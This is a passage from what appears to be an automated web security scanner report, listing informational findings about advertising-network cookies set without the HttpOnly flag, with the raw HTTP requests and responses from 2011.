Gm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/~~!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; path=/; expires=Sat, 11-May-2013 11:38:37 GMT
BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=1230047 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)~~!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/~~!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; path=/; expires=Sat, 11-May-2013 11:38:37 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 11:38:37 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.54. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.55. http://ads.cpxadroit.com/adserver/10-794ZA8LJ0UA05.cpxad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.cpxadroit.com
Path:	/adserver/10-794ZA8LJ0UA05.cpxad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ALI20110512=2894-4-1776-120,2-5-841-63,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
PLI20110512=3392-4-1-8,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
SECPOP20110512=3392-3-1-72,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIMV11HXVYE6; expires=Sat, 12-May-2012 12:02:12 GMT; path=/
CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&5JK3HWQEL6A=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; expires=Sat, 11-Jun-2011 12:02:12 GMT; path=/
CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&66SRK4O488E00|5JK1J1PH6N1=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; expires=Sat, 11-Jun-2011 12:02:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/10-794ZA8LJ0UA05.cpxad HTTP/1.1
Host: ads.cpxadroit.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPX_3P=dlxdt=4/23/2011 12:50:05 AM; CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIGY8J2TS4TB; CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00; CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ALI20110512=2894-4-1776-120,2-5-841-63,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
Set-Cookie: PLI20110512=3392-4-1-8,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
